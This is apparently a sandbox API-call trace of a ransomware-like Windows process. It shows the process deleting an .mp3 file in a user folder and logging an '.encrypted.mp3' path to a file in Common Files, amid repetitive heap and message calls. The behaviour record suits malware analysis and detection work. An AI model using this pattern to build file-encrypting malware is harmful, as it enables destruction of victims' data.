wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.702] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.703] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.703] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\q_z7.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0037.703] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.703] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.703] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.703] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.703] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.703] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.703] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.703] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.704] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.704] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.704] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.704] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.704] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.704] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3", lpFilePart=0x0) returned 0x37 [0037.704] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1e2e450, ftCreationTime.dwHighDateTime=0x1d5bebf, ftLastAccessTime.dwLowDateTime=0xb331b1b0, ftLastAccessTime.dwHighDateTime=0x1d5b923, ftLastWriteTime.dwLowDateTime=0x162e5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1836a, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Q_z7.mp3", cAlternateFileName="")) returned 0x7c2240 [0037.705] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\q_z7.mp3")) returned 1 [0037.706] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1e2e450, ftCreationTime.dwHighDateTime=0x1d5bebf, ftLastAccessTime.dwLowDateTime=0xb331b1b0, ftLastAccessTime.dwHighDateTime=0x1d5b923, ftLastWriteTime.dwLowDateTime=0x162e5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1836a, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Q_z7.mp3", cAlternateFileName="")) returned 0 [0037.706] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.706] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.706] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.707] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.707] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.707] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.707] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.707] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.707] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.707] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.707] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.708] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.708] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.708] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.708] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.708] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.708] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.708] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2289, lpOverlapped=0x0) returned 1 [0037.708] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.708] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2289, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.708] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0037.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.encrypted.mp3\r\n", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0037.708] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0037.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.encrypted.mp3\r\n", cchWideChar=68, lpMultiByteStr=0x88e138, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\Q_z7.encrypted.mp3\r\n", lpUsedDefaultChar=0x0) returned 68 [0037.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0037.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0037.709] WriteFile (in: hFile=0x128, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x43, lpOverlapped=0x0) returned 1 [0037.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.709] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.709] CloseHandle (hObject=0x128) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.710] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.710] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0037.710] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.712] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0037.712] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.712] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.712] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5e8 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0037.712] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0037.713] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.713] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.713] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.714] 